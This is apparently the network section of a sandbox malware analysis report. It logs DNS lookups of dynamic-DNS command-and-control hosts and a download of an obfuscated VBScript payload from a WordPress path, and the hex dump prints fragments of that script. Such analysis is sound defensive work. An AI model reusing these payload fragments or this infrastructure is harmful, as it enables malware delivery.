                                              May 12, 2022 14:07:44.895946026 CEST498253360192.168.11.20197.210.226.89
                                              May 12, 2022 14:07:52.909796000 CEST498253360192.168.11.20197.210.226.89
                                              May 12, 2022 14:07:59.034420967 CEST498263360192.168.11.20194.5.98.59
                                              May 12, 2022 14:07:59.068397045 CEST336049826194.5.98.59192.168.11.20
                                              May 12, 2022 14:07:59.580203056 CEST498263360192.168.11.20194.5.98.59
                                              May 12, 2022 14:07:59.614407063 CEST336049826194.5.98.59192.168.11.20
                                              May 12, 2022 14:08:00.126972914 CEST498263360192.168.11.20194.5.98.59
                                              May 12, 2022 14:08:00.160985947 CEST336049826194.5.98.59192.168.11.20
                                              May 12, 2022 14:08:00.673625946 CEST498263360192.168.11.20194.5.98.59
                                              May 12, 2022 14:08:00.707293987 CEST336049826194.5.98.59192.168.11.20
                                              May 12, 2022 14:08:01.220438957 CEST498263360192.168.11.20194.5.98.59
                                              May 12, 2022 14:08:01.254221916 CEST336049826194.5.98.59192.168.11.20
                                              May 12, 2022 14:08:01.361546040 CEST498273360192.168.11.20197.210.226.89
                                              May 12, 2022 14:08:02.376590967 CEST498273360192.168.11.20197.210.226.89
                                              May 12, 2022 14:08:04.391557932 CEST498273360192.168.11.20197.210.226.89
                                              May 12, 2022 14:08:08.406322956 CEST498273360192.168.11.20197.210.226.89
                                              May 12, 2022 14:08:16.420222998 CEST498273360192.168.11.20197.210.226.89

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              May 12, 2022 14:01:30.880023956 CEST4933953192.168.11.201.1.1.1
                                              May 12, 2022 14:01:30.908416986 CEST53493391.1.1.1192.168.11.20
                                              May 12, 2022 14:01:34.561418056 CEST5839853192.168.11.201.1.1.1
                                              May 12, 2022 14:01:35.629291058 CEST5196153192.168.11.201.1.1.1
                                              May 12, 2022 14:01:36.032222033 CEST6182253192.168.11.201.1.1.1
                                              May 12, 2022 14:01:36.149482965 CEST53618221.1.1.1192.168.11.20
                                              May 12, 2022 14:01:38.475307941 CEST5130253192.168.11.201.1.1.1
                                              May 12, 2022 14:01:38.485636950 CEST53513021.1.1.1192.168.11.20
                                              May 12, 2022 14:02:46.678739071 CEST5692353192.168.11.201.1.1.1
                                              May 12, 2022 14:02:46.795648098 CEST53569231.1.1.1192.168.11.20
                                              May 12, 2022 14:02:49.115876913 CEST5514453192.168.11.201.1.1.1
                                              May 12, 2022 14:02:49.125688076 CEST53551441.1.1.1192.168.11.20
                                              May 12, 2022 14:03:49.868005037 CEST5118253192.168.11.201.1.1.1
                                              May 12, 2022 14:03:49.973295927 CEST53511821.1.1.1192.168.11.20
                                              May 12, 2022 14:03:52.289199114 CEST6105553192.168.11.201.1.1.1
                                              May 12, 2022 14:03:52.299618959 CEST53610551.1.1.1192.168.11.20
                                              May 12, 2022 14:04:52.903026104 CEST5165953192.168.11.201.1.1.1
                                              May 12, 2022 14:04:53.010270119 CEST53516591.1.1.1192.168.11.20
                                              May 12, 2022 14:04:55.339921951 CEST5018453192.168.11.201.1.1.1
                                              May 12, 2022 14:04:55.350616932 CEST53501841.1.1.1192.168.11.20
                                              May 12, 2022 14:05:55.436346054 CEST5006853192.168.11.201.1.1.1
                                              May 12, 2022 14:05:55.546958923 CEST53500681.1.1.1192.168.11.20
                                              May 12, 2022 14:05:57.872983932 CEST5243253192.168.11.201.1.1.1
                                              May 12, 2022 14:05:57.887444019 CEST53524321.1.1.1192.168.11.20
                                              May 12, 2022 14:07:11.919681072 CEST5089853192.168.11.201.1.1.1
                                              May 12, 2022 14:07:12.034357071 CEST53508981.1.1.1192.168.11.20
                                              May 12, 2022 14:07:14.356894970 CEST6515253192.168.11.201.1.1.1
                                              May 12, 2022 14:07:14.367139101 CEST53651521.1.1.1192.168.11.20

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              May 12, 2022 14:01:30.880023956 CEST192.168.11.201.1.1.10xc6d5Standard query (0)vegproworld.comA (IP address)IN (0x0001)
                                              May 12, 2022 14:01:34.561418056 CEST192.168.11.201.1.1.10x7e5cStandard query (0)onedrive.live.comA (IP address)IN (0x0001)
                                              May 12, 2022 14:01:35.629291058 CEST192.168.11.201.1.1.10xd8a7Standard query (0)jgdbpa.am.files.1drv.comA (IP address)IN (0x0001)
                                              May 12, 2022 14:01:36.032222033 CEST192.168.11.201.1.1.10x3d7cStandard query (0)toshiba1122.duckdns.orgA (IP address)IN (0x0001)
                                              May 12, 2022 14:01:38.475307941 CEST192.168.11.201.1.1.10xd396Standard query (0)toshiba1122.ddns.netA (IP address)IN (0x0001)
                                              May 12, 2022 14:02:46.678739071 CEST192.168.11.201.1.1.10x5ae7Standard query (0)toshiba1122.duckdns.orgA (IP address)IN (0x0001)
                                              May 12, 2022 14:02:49.115876913 CEST192.168.11.201.1.1.10xbc2cStandard query (0)toshiba1122.ddns.netA (IP address)IN (0x0001)
                                              May 12, 2022 14:03:49.868005037 CEST192.168.11.201.1.1.10x3bfbStandard query (0)toshiba1122.duckdns.orgA (IP address)IN (0x0001)
                                              May 12, 2022 14:03:52.289199114 CEST192.168.11.201.1.1.10xeb3Standard query (0)toshiba1122.ddns.netA (IP address)IN (0x0001)
                                              May 12, 2022 14:04:52.903026104 CEST192.168.11.201.1.1.10xb312Standard query (0)toshiba1122.duckdns.orgA (IP address)IN (0x0001)
                                              May 12, 2022 14:04:55.339921951 CEST192.168.11.201.1.1.10xc379Standard query (0)toshiba1122.ddns.netA (IP address)IN (0x0001)
                                              May 12, 2022 14:05:55.436346054 CEST192.168.11.201.1.1.10x14a4Standard query (0)toshiba1122.duckdns.orgA (IP address)IN (0x0001)
                                              May 12, 2022 14:05:57.872983932 CEST192.168.11.201.1.1.10x7612Standard query (0)toshiba1122.ddns.netA (IP address)IN (0x0001)
                                              May 12, 2022 14:07:11.919681072 CEST192.168.11.201.1.1.10xfcabStandard query (0)toshiba1122.duckdns.orgA (IP address)IN (0x0001)
                                              May 12, 2022 14:07:14.356894970 CEST192.168.11.201.1.1.10xed5eStandard query (0)toshiba1122.ddns.netA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              May 12, 2022 14:01:30.908416986 CEST1.1.1.1192.168.11.200xc6d5No error (0)vegproworld.com148.66.138.165A (IP address)IN (0x0001)
                                              May 12, 2022 14:01:34.570173025 CEST1.1.1.1192.168.11.200x7e5cNo error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                              May 12, 2022 14:01:34.570173025 CEST1.1.1.1192.168.11.200x7e5cNo error (0)l-0004.l-dc-msedge.net13.107.43.13A (IP address)IN (0x0001)
                                              May 12, 2022 14:01:35.709649086 CEST1.1.1.1192.168.11.200xd8a7No error (0)jgdbpa.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                                              May 12, 2022 14:01:35.709649086 CEST1.1.1.1192.168.11.200xd8a7No error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                              May 12, 2022 14:01:36.149482965 CEST1.1.1.1192.168.11.200x3d7cNo error (0)toshiba1122.duckdns.org194.5.98.59A (IP address)IN (0x0001)
                                              May 12, 2022 14:01:38.485636950 CEST1.1.1.1192.168.11.200xd396No error (0)toshiba1122.ddns.net197.210.226.45A (IP address)IN (0x0001)
                                              May 12, 2022 14:02:46.795648098 CEST1.1.1.1192.168.11.200x5ae7No error (0)toshiba1122.duckdns.org194.5.98.59A (IP address)IN (0x0001)
                                              May 12, 2022 14:02:49.125688076 CEST1.1.1.1192.168.11.200xbc2cNo error (0)toshiba1122.ddns.net197.210.226.89A (IP address)IN (0x0001)
                                              May 12, 2022 14:03:49.973295927 CEST1.1.1.1192.168.11.200x3bfbNo error (0)toshiba1122.duckdns.org194.5.98.59A (IP address)IN (0x0001)
                                              May 12, 2022 14:03:52.299618959 CEST1.1.1.1192.168.11.200xeb3No error (0)toshiba1122.ddns.net197.210.226.89A (IP address)IN (0x0001)
                                              May 12, 2022 14:04:53.010270119 CEST1.1.1.1192.168.11.200xb312No error (0)toshiba1122.duckdns.org194.5.98.59A (IP address)IN (0x0001)
                                              May 12, 2022 14:04:55.350616932 CEST1.1.1.1192.168.11.200xc379No error (0)toshiba1122.ddns.net197.210.226.89A (IP address)IN (0x0001)
                                              May 12, 2022 14:05:55.546958923 CEST1.1.1.1192.168.11.200x14a4No error (0)toshiba1122.duckdns.org194.5.98.59A (IP address)IN (0x0001)
                                              May 12, 2022 14:05:57.887444019 CEST1.1.1.1192.168.11.200x7612No error (0)toshiba1122.ddns.net197.210.226.89A (IP address)IN (0x0001)
                                              May 12, 2022 14:07:12.034357071 CEST1.1.1.1192.168.11.200xfcabNo error (0)toshiba1122.duckdns.org194.5.98.59A (IP address)IN (0x0001)
                                              May 12, 2022 14:07:14.367139101 CEST1.1.1.1192.168.11.200xed5eNo error (0)toshiba1122.ddns.net197.210.226.89A (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • vegproworld.com
                                              • onedrive.live.com

                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.11.2049738148.66.138.165443C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                              TimestampkBytes transferredDirectionData
                                              2022-05-12 12:01:31 UTC0OUTGET /wp-content/Touchb.vbs HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: vegproworld.com
                                              Cache-Control: no-cache
                                              2022-05-12 12:01:32 UTC0INHTTP/1.1 200 OK
                                              Date: Thu, 12 May 2022 12:01:31 GMT
                                              Server: Apache
                                              Upgrade: h2,h2c
                                              Connection: Upgrade, close
                                              Last-Modified: Tue, 10 May 2022 23:34:55 GMT
                                              ETag: "6b0093d-3e3f5-5deb0c5a6958a"
                                              Accept-Ranges: bytes
                                              Content-Length: 254965
                                              Vary: Accept-Encoding
                                              Content-Type: text/vbscript
                                              2022-05-12 12:01:32 UTC0INData Raw: 27 53 75 70 65 72 73 74 69 6d 20 72 75 6b 61 6e 73 62 75 20 44 49 53 50 41 53 53 20 4a 75 73 74 69 74 73 72 33 20 46 49 53 4b 45 52 49 54 20 74 61 6b 6b 65 72 20 53 41 50 52 45 4d 49 41 53 20 45 6c 69 6d 36 20 73 65 64 67 65 73 65 20 46 49 4c 54 52 45 20 0d 0a 27 47 79 72 61 20 75 6e 68 75 20 46 6f 72 72 61 61 33 20 46 4f 52 4f 4d 54 41 4c 43 48 20 73 61 77 6e 69 65 72 65 20 6d 65 74 61 67 65 6f 20 49 6e 6f 66 66 65 6e 63 69 76 38 20 41 75 74 6f 6d 61 74 6f 20 52 45 46 45 4c 47 55 4c 44 20 41 4e 41 50 48 59 4c 41 43 20 6a 75 6c 65 70 73 75 6e 64 69 20 6f 6b 73 65 20 61 69 74 63 68 20 43 61 72 6f 33 20 4e 6f 75 6e 6c 65 73 73 76 34 20 4c 59 44 45 46 52 49 54 20 55 4e 53 4f 4d 42 52 45 4e 45 20 4b 45 52 41 54 4f 4d 20 4f 56 45 52 50 4f 53 54 49 4e 20 54 6f
                                              Data Ascii: 'Superstim rukansbu DISPASS Justitsr3 FISKERIT takker SAPREMIAS Elim6 sedgese FILTRE 'Gyra unhu Forraa3 FOROMTALCH sawniere metageo Inoffenciv8 Automato REFELGULD ANAPHYLAC julepsundi okse aitch Caro3 Nounlessv4 LYDEFRIT UNSOMBRENE KERATOM OVERPOSTIN To
                                              2022-05-12 12:01:32 UTC8INData Raw: 61 38 38 37 43 4d 61 38 38 37 33 43 41 4c 4c 44 43 4d 61 38 38 43 3a 43 35 33 43 41 4c 4c 43 41 4c 4c 43 43 4d 61 38 38 43 3a 43 35 39 36 43 41 4c 4c 42 4d 61 38 38 35 45 39 43 3a 43 44 39 41 43 41 4c 4c 39 39 43 41 4c 4c 44 37 43 41 4c 4c 43 43 4d 61 38 38 43 3a 43 35 33 43 41 4c 4c 37 33 38 35 4d 61 38 38 58 69 6c 6f 32 32 35 39 37 39 58 69 6c 6f 32 32 42 37 39 4d 61 38 38 43 4d 61 38 38 33 42 35 4d 61 38 38 58 69 6c 6f 32 32 4d 61 38 38 33 41 39 32 38 32 43 3a 43 45 58 69 6c 6f 32 32 43 41 4c 4c 43 43 4d 61 38 38 43 4d 61 38 38 45 43 41 4c 4c 37 35 38 35 4d 61 38 38 58 69 6c 6f 32 32 43 37 37 44 43 41 4c 4c 38 44 35 41 43 41 4c 4c 36 43 35 4d 61 38 38 33 58 69 6c 6f 32 32 4d 61 38 38 37 37 39 4d 61 38 38 39 38 33 33 43 41 4c 4c 36 43 32 42 36 39 41 43
                                              Data Ascii: a887CMa8873CALLDCMa88C:C53CALLCALLCCMa88C:C596CALLBMa885E9C:CD9ACALL99CALLD7CALLCCMa88C:C53CALL7385Ma88Xilo225979Xilo22B79Ma88CMa883B5Ma88Xilo22Ma883A9282C:CEXilo22CALLCCMa88CMa88ECALL7585Ma88Xilo22C77DCALL8D5ACALL6C5Ma883Xilo22Ma88779Ma889833CALL6C2B69AC
                                              2022-05-12 12:01:32 UTC15INData Raw: 6f 32 32 41 45 45 42 45 33 35 4d 61 38 38 42 45 43 38 45 43 3a 43 32 37 42 38 38 36 58 69 6c 6f 32 32 35 43 43 42 32 43 32 43 32 43 3a 43 35 33 43 41 4c 4c 33 4d 61 38 38 41 41 32 33 35 43 3a 43 43 38 43 3a 43 39 38 38 43 41 4c 4c 45 4d 61 38 38 37 43 41 4c 4c 45 41 41 58 69 6c 6f 32 32 43 41 36 42 37 33 43 41 4c 4c 44 39 44 43 41 4c 4c 37 39 36 43 3a 43 32 4d 61 38 38 32 43 39 4d 61 38 38 38 39 43 3a 43 41 38 44 36 32 36 4d 61 38 38 33 4d 61 38 38 33 43 3a 43 44 45 43 3a 43 41 36 43 3a 43 39 32 44 4d 61 38 38 41 44 45 43 3a 43 37 44 33 58 69 6c 6f 32 32 58 69 6c 6f 32 32 45 45 39 36 43 41 4c 4c 42 37 38 39 43 3a 43 43 37 37 4d 61 38 38 33 4d 61 38 38 43 41 4c 4c 45 43 3a 43 45 38 44 4d 61 38 38 43 43 3a 43 43 45 38 39 36 38 33 44 38 42 33 4d 61 38 38 41
                                              Data Ascii: o22AEEBE35Ma88BEC8EC:C27B886Xilo225CCB2C2C2C:C53CALL3Ma88AA235C:CC8C:C988CALLEMa887CALLEAAXilo22CA6B73CALLD9DCALL796C:C2Ma882C9Ma8889C:CA8D626Ma883Ma883C:CDEC:CA6C:C92DMa88ADEC:C7D3Xilo22Xilo22EE96CALLB789C:CC77Ma883Ma88CALLEC:CE8DMa88CC:CCE89683D8B3Ma88A
                                              2022-05-12 12:01:32 UTC23INData Raw: 4d 61 38 38 42 4d 61 38 38 45 35 58 69 6c 6f 32 32 44 32 33 58 69 6c 6f 32 32 39 45 39 43 41 4c 4c 35 32 44 44 37 44 4d 61 38 38 42 45 43 41 4c 4c 38 45 43 3a 43 35 43 41 4c 4c 58 69 6c 6f 32 32 41 43 43 41 4c 4c 4d 61 38 38 58 69 6c 6f 32 32 43 43 3a 43 4d 61 38 38 42 44 38 4d 61 38 38 32 32 38 37 43 41 4c 4c 43 41 4c 4c 33 4d 61 38 38 43 33 38 43 41 4c 4c 36 43 3a 43 44 33 32 58 69 6c 6f 32 32 33 43 41 4c 4c 33 39 36 35 4d 61 38 38 33 41 33 45 32 45 43 41 4c 4c 38 35 43 35 42 42 41 38 42 58 69 6c 6f 32 32 4d 61 38 38 35 44 32 45 4d 61 38 38 35 4d 61 38 38 42 43 43 58 69 6c 6f 32 32 43 3a 43 39 38 45 32 33 43 41 4c 4c 43 41 4c 4c 43 4d 61 38 38 43 33 42 35 36 43 37 41 43 41 4c 4c 43 4d 61 38 38 43 41 4c 4c 43 41 4c 4c 43 41 4c 4c 33 43 3a 43 35 42 42 43
                                              Data Ascii: Ma88BMa88E5Xilo22D23Xilo229E9CALL52DD7DMa88BECALL8EC:C5CALLXilo22ACCALLMa88Xilo22CC:CMa88BD8Ma882287CALLCALL3Ma88C38CALL6C:CD32Xilo223CALL3965Ma883A3E2ECALL85C5BBA8BXilo22Ma885D2EMa885Ma88BCCXilo22C:C98E23CALLCALLCMa88C3B56C7ACALLCMa88CALLCALLCALL3C:C5BBC
                                              2022-05-12 12:01:32 UTC31INData Raw: 43 3a 43 58 69 6c 22 0d 0a 66 75 6e 6b 74 69 6f 6e 73 6b 20 3d 20 66 75 6e 6b 74 69 6f 6e 73 6b 20 26 20 22 6f 32 32 41 33 35 38 58 69 6c 6f 32 32 42 44 44 43 3a 43 42 43 4d 61 38 38 32 39 43 41 4c 4c 45 43 4d 61 38 38 43 3a 43 35 43 41 4c 4c 33 38 45 35 36 39 4d 61 38 38 43 43 33 36 43 45 36 44 44 43 33 4d 61 38 38 42 58 69 6c 6f 32 32 42 41 44 42 43 35 43 3a 43 58 69 6c 6f 32 32 4d 61 38 38 37 45 45 35 43 41 4c 4c 38 36 41 44 35 36 36 58 69 6c 6f 32 32 43 4d 61 38 38 43 3a 43 35 36 58 69 6c 6f 32 32 43 58 69 6c 6f 32 32 43 44 32 32 35 58 69 6c 6f 32 32 41 43 41 4c 4c 43 43 41 4c 4c 43 58 69 6c 6f 32 32 36 43 3a 43 35 58 69 6c 6f 32 32 43 4d 61 38 38 43 3a 43 35 4d 61 38 38 32 45 58 69 6c 6f 32 32 38 58 69 6c 6f 32 32 32 38 43 3a 43 36 43 41 4c 4c 33 43
                                              Data Ascii: C:CXil"funktionsk = funktionsk & "o22A358Xilo22BDDC:CBCMa8829CALLECMa88C:C5CALL38E569Ma88CC36CE6DDC3Ma88BXilo22BADBC5C:CXilo22Ma887EE5CALL86AD566Xilo22CMa88C:C56Xilo22CXilo22CD225Xilo22ACALLCCALLCXilo226C:C5Xilo22CMa88C:C5Ma882EXilo228Xilo2228C:C6CALL3C
                                              2022-05-12 12:01:32 UTC39INData Raw: 4c 4c 43 41 4c 4c 37 4d 61 38 38 41 45 33 32 44 45 41 43 3a 43 58 69 6c 6f 32 32 36 39 58 69 6c 6f 32 32 42 58 69 6c 6f 32 32 39 58 69 6c 6f 32 32 43 3a 43 38 4d 61 38 38 58 69 6c 6f 32 32 42 37 44 45 43 36 58 69 6c 6f 32 32 43 3a 43 42 42 58 69 6c 6f 32 32 4d 61 38 38 36 4d 61 38 38 41 43 41 4c 4c 33 38 33 43 3a 43 41 32 44 42 36 43 3a 43 39 43 37 43 3a 43 37 33 43 41 4c 4c 43 41 4c 4c 43 43 3a 43 39 38 33 43 41 4c 4c 33 39 43 3a 43 32 35 35 42 43 41 4c 4c 44 37 41 43 42 33 44 4d 61 38 38 43 37 37 43 41 4c 4c 33 44 41 41 41 38 45 43 3a 43 45 44 43 41 4c 4c 36 45 38 38 33 4d 61 38 38 58 69 6c 6f 32 32 33 42 43 3a 43 43 3a 43 39 43 37 43 3a 43 37 33 43 41 4c 4c 43 41 4c 4c 43 32 38 58 69 6c 6f 32 32 38 38 37 43 41 4c 4c 43 43 4d 61 38 38 38 39 43 3a 43 44
                                              Data Ascii: LLCALL7Ma88AE32DEAC:CXilo2269Xilo22BXilo229Xilo22C:C8Ma88Xilo22B7DEC6Xilo22C:CBBXilo22Ma886Ma88ACALL383C:CA2DB6C:C9C7C:C73CALLCALLCC:C983CALL39C:C255BCALLD7ACB3DMa88C77CALL3DAAA8EC:CEDCALL6E883Ma88Xilo223BC:CC:C9C7C:C73CALLCALLC28Xilo22887CALLCCMa8889C:CD
                                              2022-05-12 12:01:32 UTC47INData Raw: 4d 61 38 38 43 3a 43 43 3a 43 33 43 41 4c 4c 43 41 4c 4c 43 4d 61 38 38 43 32 43 58 69 6c 6f 32 32 38 33 37 37 38 37 43 41 4c 4c 37 37 43 35 43 41 4c 4c 32 58 69 6c 6f 32 32 35 43 41 4c 4c 39 44 37 37 38 4d 61 38 38 32 45 42 35 4d 61 38 38 43 3a 43 45 43 3a 43 37 42 36 32 42 4d 61 38 38 43 33 35 43 43 41 4c 4c 41 58 69 6c 6f 32 32 32 35 4d 61 38 38 41 43 41 4c 4c 43 3a 43 41 38 45 44 42 44 43 43 41 4c 4c 41 42 4d 61 38 38 43 32 44 37 45 39 43 3a 43 43 3a 43 41 43 3a 43 32 42 37 43 41 43 41 4c 4c 33 35 35 44 41 43 41 4c 4c 38 39 43 41 4c 4c 36 43 4d 61 38 38 4d 61 38 38 38 43 33 33 45 43 41 4c 4c 37 36 37 37 37 44 43 41 4c 4c 35 33 45 43 41 4c 4c 43 43 4d 61 38 38 41 44 45 42 37 33 43 4d 61 38 38 43 3a 43 35 43 41 4c 4c 33 38 44 44 42 39 35 38 4d 61 38 38
                                              Data Ascii: Ma88C:CC:C3CALLCALLCMa88C2CXilo22837787CALL77C5CALL2Xilo225CALL9D778Ma882EB5Ma88C:CEC:C7B62BMa88C35CCALLAXilo2225Ma88ACALLC:CA8EDBDCCALLABMa88C2D7E9C:CC:CAC:C2B7CACALL355DACALL89CALL6CMa88Ma888C33ECALL76777DCALL53ECALLCCMa88ADEB73CMa88C:C5CALL38DDB958Ma88
                                              2022-05-12 12:01:32 UTC55INData Raw: 4d 61 38 38 36 33 43 37 37 39 58 69 6c 6f 32 32 4d 61 38 38 41 44 43 3a 43 42 43 41 4c 4c 43 43 4d 61 38 38 43 3a 43 35 39 37 43 44 38 45 58 69 6c 6f 32 32 39 42 45 45 43 35 43 58 69 6c 6f 32 32 41 41 41 58 69 6c 6f 32 32 43 39 33 58 69 6c 6f 32 32 45 41 38 4d 61 38 38 38 41 43 41 45 36 33 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61
                                              Data Ascii: Ma8863C779Xilo22Ma88ADC:CBCALLCCMa88C:C597CD8EXilo229BEEC5CXilo22AAAXilo22C93Xilo22EA8Ma888ACAE63Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma
                                              2022-05-12 12:01:32 UTC62INData Raw: 43 41 4c 4c 43 58 69 6c 6f 32 32 38 58 69 6c 6f 32 32 33 4d 61 38 38 43 3a 43 43 3a 43 42 43 3a 43 43 3a 43 38 43 3a 43 4d 61 38 38 43 3a 43 36 39 37 37 43 3a 43 43 3a 43 33 43 41 4c 4c 43 41 4c 4c 43 42 43 41 4c 4c 43 3a 43 32 42 43 37 39 35 43 43 3a 43 35 33 43 41 4c 4c 43 41 4c 4c 43 43 58 69 6c 6f 32 32 32 33 43 38 33 43 41 4c 4c 43 3a 43 33 4d 61 38 38 58 69 6c 6f 32 32 33 45 32 42 43 3a 43 35 38 43 3a 43 37 36 33 42 43 3a 43 35 41 39 33 45 43 41 4c 4c 43 43 4d 61 38 38 42 43 3a 43 58 69 6c 6f 32 32 43 43 3a 43 33 45 45 43 58 69 6c 6f 32 32 43 58 69 6c 6f 32 32 37 44 43 3a 43 35 41 39 33 45 43 41 4c 4c 43 43 4d 61 38 38 36 37 32 36 38 35 4d 61 38 38 36 43 43 3a 43 38 41 58 69 6c 6f 32 32 4d 61 38 38 43 58 69 6c 6f 32 32 43 3a 43 35 33 43 41 4c 4c 37
                                              Data Ascii: CALLCXilo228Xilo223Ma88C:CC:CBC:CC:C8C:CMa88C:C6977C:CC:C3CALLCALLCBCALLC:C2BC795CC:C53CALLCALLCCXilo2223C83CALLC:C3Ma88Xilo223E2BC:C58C:C763BC:C5A93ECALLCCMa88BC:CXilo22CC:C3EECXilo22CXilo227DC:C5A93ECALLCCMa88672685Ma886CC:C8AXilo22Ma88CXilo22C:C53CALL7
                                              2022-05-12 12:01:32 UTC70INData Raw: 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 22 0d 0a 66 75 6e 6b 74 69 6f 6e 73 6b 20 3d 20 66 75 6e 6b 74 69 6f 6e 73 6b 20 26 20 22 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 58 69 6c 6f 32 32 45 43 43 3a 43 43 3a 43 32 36 41 41 33 33 44 33 43 41 4c 4c 39 39 44 4d 61 38 38 41 33 42 4d 61 38 38 33 43 35 43 44 37 38 33 45 37 4d 61 38 38 43 41 42 32 36 44 58 69 6c 6f 32 32 43 4d 61 38 38 41 32 39 41 32 36 43 3a 43 42 42 33 45 44 4d 61 38 38 43 3a 43 35 35 39 4d 61 38 38 42 4d 61 38 38 58 69 6c 6f 32 32 43 3a 43 43 58 69 6c 6f 32 32 43
                                              Data Ascii: 8Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma88"funktionsk = funktionsk & "63C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863CXilo22ECC:CC:C26AA33D3CALL99DMa88A3BMa883C5CD783E7Ma88CAB26DXilo22CMa88A29A26C:CBB3EDMa88C:C559Ma88BMa88Xilo22C:CCXilo22C
                                              2022-05-12 12:01:32 UTC78INData Raw: 4c 4c 43 41 4c 4c 43 3a 43 41 32 42 33 35 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43
                                              Data Ascii: LLCALLC:CA2B35C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C
                                              2022-05-12 12:01:32 UTC86INData Raw: 4d 61 38 38 43 3a 43 35 43 41 4c 4c 33 38 45 39 43 39 37 44 33 43 41 4c 4c 58 69 6c 6f 32 32 58 69 6c 6f 32 32 36 4d 61 38 38 33 35 42 37 35 33 4d 61 38 38 43 36 43 41 4c 4c 43 41 4c 4c 43 41 4c 4c 43 3a 43 43 3a 43 39 43 41 4c 4c 38 58 69 6c 6f 32 32 42 43 41 4c 4c 45 43 4d 61 38 38 43 3a 43 35 43 41 4c 4c 33 39 37 39 43 35 36 36 32 41 33 37 37 44 44 44 33 4d 61 38 38 38 32 58 69 6c 6f 32 32 35 35 45 41 43 38 37 44 43 41 4c 4c 58 69 6c 6f 32 32 42 36 33 42 39 37 43 45 38 32 44 38 43 32 43 3a 43 35 33 43 41 4c 4c 33 4d 61 38 38 42 44 32 33 43 41 4c 4c 35 41 33 43 41 4c 4c 45 43 45 42 38 43 41 4c 4c 43 43 38 43 3a 43 35 33 43 41 4c 4c 33 4d 61 38 38 41 38 45 45 35 44 43 43 41 4c 4c 4d 61 38 38 33 43 41 4c 4c 32 36 41 38 4d 61 38 38 44 43 41 4c 4c 58 69 6c
                                              Data Ascii: Ma88C:C5CALL38E9C97D3CALLXilo22Xilo226Ma8835B753Ma88C6CALLCALLCALLC:CC:C9CALL8Xilo22BCALLECMa88C:C5CALL3979C5662A377DDD3Ma8882Xilo2255EAC87DCALLXilo22B63B97CE82D8C2C:C53CALL3Ma88BD23CALL5A3CALLECEB8CALLCC8C:C53CALL3Ma88A8EE5DCCALLMa883CALL26A8Ma88DCALLXil
